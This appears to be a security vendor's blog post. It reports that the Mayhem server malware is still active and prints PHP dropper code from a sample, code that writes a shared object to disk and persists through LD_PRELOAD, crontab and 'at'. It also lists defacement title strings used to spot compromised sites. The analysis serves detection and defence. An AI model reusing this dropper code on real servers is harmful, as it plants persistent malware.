Mayhem malware still on the wild

Years ago, colleagues from Yandex introduced the concept of Mayhem infections.

In that post, they provided very detailed information about the malware, its functionalities and capabilities.

The interesting point of the malicious code, is its mechanisms of planting itself in the system. Even if an infected server gets the site restored from a backup and php re-installed, the malware would still be there. That happens because a compiled shared object gets copied into the system and runs as a service.

During an Incident Response investigation, we found that the Mayhem malware family is still in the wild and so we wanted to point out a few changes. This malware targets both x32 & x64 architectures, and chooses the correct shared object version to load depending on the current system’s architecture as you can see below:

$arch = 64;if (intval("9223372036854775807") == 2147483647)$arch = 32;$so = $arch == 32 ? $so32 : $so64;

Here's the code for copying and starting the malware:

$f = fopen("/usr/bin/host", "rb");if ($f) {$n = unpack("C*", fread($f, 8));$so[7] = sprintf("%c", $n[8]);fclose($f);}$n = file_put_contents("./", $so);$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];$HBN=basename("/usr/bin/host");$SCP=getcwd();@file_put_contents("", "#!/bin/shncd '".$SCP."'nif [ -f './' ];then killall -9 $HBN;export AU='".$AU."'nexport LD_PRELOAD=./jquery.son/usr/bin/hostnunset LD_PRELOADncrontab -l|grep -v ''|grep -v crontab|crontabnfinrm 1.shnexit 0n");

@chmod("", 0777);@system("at now -f", $ret);

Unlike the original samples, there is no reference to MAYHEM_DEBUG system variable anymore. Also, the shared object name was changed from “” to “”

To prevent attacks that exploit vulnerabilities in your site software, we suggest using a Web Application Firewall (WAF).

Titles, Imprints and Marks Left by Attackers

Some attackers seem to like signing their scripts. This fact is especially true for defacements and backdoors, where attackers show their pride stating that they “owned” a site by signing their own malware. Sometimes they write their expressions and nicknames on the title or in the middle of the file:

<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file's title, we may be able to tell if a file is malware. Though, most of the times, finding malware requires much deeper scanning, decryption and deobfuscation processes, making the task to be difficult and time consuming. If you don’t use such a scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.